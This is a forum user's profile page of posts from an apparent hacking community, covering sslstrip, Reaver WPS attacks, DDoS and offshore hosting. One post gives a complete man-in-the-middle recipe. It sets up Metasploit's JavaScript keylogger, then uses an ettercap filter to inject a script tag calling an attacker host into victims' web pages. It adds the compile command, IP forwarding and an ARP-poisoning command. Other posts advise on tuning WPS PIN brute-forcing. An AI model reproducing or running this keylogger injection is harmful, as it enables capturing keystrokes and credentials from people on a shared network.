Jump to content

Diggs

Active Members
  • Posts

    36
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Diggs's Achievements

Newbie

Newbie (1/14)

  1. Diggs

    The Middler

    I've spent a bit of time working on the Middler issues for a while and haven't gotten to the bottom of them. The python parsing is both slow and mildly buggy and the results just haven't shown up for a standalone application which can accomplish what I was hoping for. In the meantime, I found that the Metasploit http_javascript_keylogger has been added back to the stable branch. Combined with some good ettercap filters, you can append either the Java modules or the keylogger script and it's much, much faster. First, we need to generate the Javascript Keylogger and set up a handler in Metasploit for it. This is under use auxiliary/server/capture/http_javascript_keylogger For some more details on using the module, look here: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger Setting this up properly will set up the javascript in a random folder under /var/www and create a handler for the returned characters. The next step is to insert it into the stream. The ettercap filter I have been playing with looks like this: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</head>")) { replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> "); } if (search(DATA.data, "</HEAD>")) { replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> "); } } The qZBRDzd/test.js is the file which is created from the Metasploit module. This can be compiled with etterfilter: etterfilter jsEmbed.filter -o jsEmbed.ef So, we've got a filter that will insert the javascript src right after the head of a document. We now need to run ettercap and MITM the network. You will need to set up ip_forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward And make sure ettercap is set up in etter.conf to handle iptables. Look that part up if you are new to it. Now run ettercap: ettercap -T -q -F jsEmbed.ef -M ARP // // With this setup, I've found what I originally wanted in the Middler and also used a couple of well known and stable products instead of a one-off demo for a con. If there are any fun ideas or improvements, let me know.
  2. I'm looking at setting up a laptop so I can connect to one of the wireless cards attached to it and ssh into the laptop directly from the wireless connection. Is there a specific term I should be searching for setting up a direct wireless connection without bridging to allow an ssh connection? Thanks
  3. Can anyone confirm sauce on this? I'm always a bit reluctant to install a package that doesn't provide any sourcefiles on Sourceforge. Other than that, this seems like an interesting project and something I was looking around to get for a while.
  4. I have used Reaver. The reason I was asking was so that I could fine tune the reaver settings. The MAC address gives the Manufacturer, but not the model. I started looking through an airodump of the Reaver working and found that I could actually find the Make, Model and firmware version of the router in the pcap file. I was using vi, but I bet if you fired up Wireshark, you could find a lot more info. With this, I can start looking up WPS pin prefixes and the Reaver settings. I would highly recommend this as a step to fine tuning the Reaver attack.
  5. I have a couple questions about the following demo: http://partners.immunityinc.com/movies/SILICA-WPS.mov So basically, Silica has a tab to get more information from the WAP which they are interested in. This includes the make, model and series of WPS pins that have been seen. This allows a user to fine tune the attack. I am interested in if anyone knows how they get the exact make and model off of an unconnected Wireless router and if anyone else has WPS pin-lists to help narrow down the range of pins. I have looked into MAC address lookups, but they identify the make and don't provide much information on the model. Is there any way of analyzing either packets or banners off of an unconnected router to identify it? If anyone here works for Immunity, big ups on Canvas, the Debugger and Silica. If you have a $3400 off coupon, toss it my way. Has anyone else started a WPS Pin list? I could see this being incredibly useful for pattern matching.
  6. Diggs

    Sslstrip

    You probably need to set the permissions for that file to execute. There are two ways to fix this. First Method ============= run 'python ./sslstrip.py -l 8080' python will read the script and run it. Second Method ============= First, find out what the permissions currently are with 'ls -ltr sslstrip.py' in the directory you have sslstrip.py in. You should have rwxrw-rw- for that to run natively. Try 'sudo chmod 755 sslstrip.py' Then run './sslstrip.py -l 8080' Basically, this is happening because the file is readable, but not executable. You should set it to exacutable to run without the 'python' command prepended. Otherwise, python will be executed and it will just read the sslstrip.py script. Let me know if that makes sense.
  7. I would make sure that ettercap is up to the current version. The L3 errors show up with the older version when there is a conflict with a newer Linux kernel.
  8. You should also check out int0x80's talk on Anti-Forensics. He sets up some scripts to automatically delete the usb drives when they show up. There might be something in his checksum that would prevent the driver from firing if it's not in the whitelist.
  9. This is kind of a known issue with sslstrip. It shows up when an ssl connection has been closed at an unexpected time. It pops up pretty regularly, but can be ignored. I would suggest to upgrading it to 0.9 which is the most recent version: http://www.thoughtcrime.org/software/sslstrip/ I would also make sure that ettercap is upgraded if you are using it. Otherwise it acts really funny with newer versions of the Linux kernel.
  10. Diggs

    The Middler

    Ach, now it's been moved to the unstable branch.
  11. For fun, you can also read up on the new Hash collisions. If you can understand that, then you'll probably be able to get DDOS's in general. Plus, it'll get you a bit more into code development. There has also been some DNS based DoS work you could look at. You might also want to specify what you are looking to do. I imagine that you might be trying to get into something and not coming at it in the best direction. I would advise a lot of caution though. Plenty of people who thought they were good are in jails right now for not being smart enough about what illegal things seemed like fun.
  12. Diggs

    The Middler

    I've been working on a couple irritating things with the Middler code and then ran across this: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/server/capture/javascript_keylogger.rb Metasploit MitM keylogger. I'll see if I can get the Middler code working still, but this seems like it pretty much covers what I was hoping to do.
  13. You might also want to try a Python script. I know I've used them to communicate over serial before and it has Serial libraries which aren't too tough.
  14. If you are really careful, you could pick a country which doesn't share extradition treaties with the US. They will probably be hostile, so getting data from that server will also be more difficult. If you are super paranoid, there are some advantages to being off-shore. They are offset by dealing with foreign bodies and all the headache that can entail. You could also set up an Amazon EC2 micro-instance which has decent bandwidth and is free-ish. Depending on how much you are using it, you could use it as an ssh pivot and I bet it would get you by.
  15. Diggs

    Trace Alert

    I know Whisper Systems does full disk encryption on a smartphone. You could set up that with the encrypted SMS and Skype to get things pretty well secured. I think I've just found the tipping point of paranoia Vs. cheapness. Buy a burn phone every week to avoid getting monitored by the Feds? Meh, I'll just let Agent Stanley listen to me talk to all my buddies.
×
×
  • Create New...